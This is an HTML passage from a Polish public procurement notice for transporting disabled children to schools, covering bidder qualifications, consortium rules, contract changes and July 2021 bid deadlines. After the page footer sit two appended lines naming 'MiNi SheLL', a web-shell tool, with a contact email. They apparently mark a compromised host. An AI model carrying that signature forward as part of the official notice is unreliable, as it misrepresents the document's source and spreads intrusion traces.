transportu drogowego w zakresie przewozu osób samochodem osobowym lub licencji na wykonywanie krajowego transportu drogowego w zakresie przewozu osób pojazdem samochodowym przeznaczonym konstrukcyjnie do przewozu powyżej 7 i nie więcej niż 9 osób łącznie z kierowcą lub zezwolenia na wykonywanie zawodu przewoźnika drogowego osób, zachowujących ważność w okresie realizacji zamówienia.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, przedmiotowe dokumenty składa ten z Wykonawców, który w ramach realizacji zamówienia bezpośrednio będzie wykonywać licencjonowaną lub objętą zezwoleniem działalność;<br/>b)	w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda od Wykonawcy: <br/>-	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonanych wspólnie z innymi Wykonawcami, wykaz winien dotyczyć usług faktycznie przez niego wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych – również faktycznie przez niego wykonywanych;<br/>-	wykazu urządzeń technicznych (pojazdów) dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1)	ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>2)	ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4.	Co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>6.	W przypadku, o którym mowa w ust. 4-5, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (Oświadczenie Konsorcjantów), z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>7.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenia z art. 125 ust. 1 ustawy PZP składane jest przez każdego z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, tj. w zakresie zmiany:<br/>1)	opiekunów wpisanych do wykazu osób stanowiącego załącznik nr 5 do umowy <br/>2)	kierowców wpisanych do wykazu osób stanowiącego załącznik nr 5 do umowy <br/>samochodów wpisanych do wykazu samochodów, stanowiącego załącznik nr 6 do umowy.<br/>3)	liczby opiekunów, kierowców oraz samochodów, w przypadku zaistnienia okoliczności określonej w pkt 11 ppkt 2 OPZ skutkującej koniecznością zatrudnienia dodatkowego opiekuna, kierowcy lub zgłoszenia dodatkowego samochodu z zastrzeżeniem, że nowi opiekunowie, kierowcy i samochody będą spełniać warunki określone w OPZ.<br/>2.	W przypadku dokonania zmiany niezgodnie z warunkami opisanymi w ust. 1, Zamawiającemu przysługuje odpowiednio uprawnienia określone w § 9 ust. 3.<br/>3.	Nie stanowią zmian w rozumieniu ust. 1:<br/>1)	zmiana adresu i siedziby szkoły lub placówki, do której uczęszcza dziecko niepełnosprawne,<br/>2)	zmiana adresu zamieszkania dziecka niepełnosprawnego,<br/>3)	zmiana szkoły lub placówki dokonana przez rodzica dziecka niepełnosprawnego,<br/>4)	rezygnacja z dowozu realizowanego przez Wykonawcę dokonana pisemnie przez rodzica dziecka niepełnosprawnego,<br/>5)	zmiana liczby dowożonych dzieci realizowana w ramach prawa opcji (zwiększenie).<br/>4.	Każda ze stron dokonując zmian, o których mowa w ust. 1 i 2 przekaże drugiej stronie stosowną informację w formie pisemnej, w terminie nie dłuższym niż 7 dni od powzięcia wiadomości <br/>o podstawie do dokonania zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Systemu Zakupowego Miasta Stołecznego Warszawy dostępnego pod adresem: https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-16 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-08 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com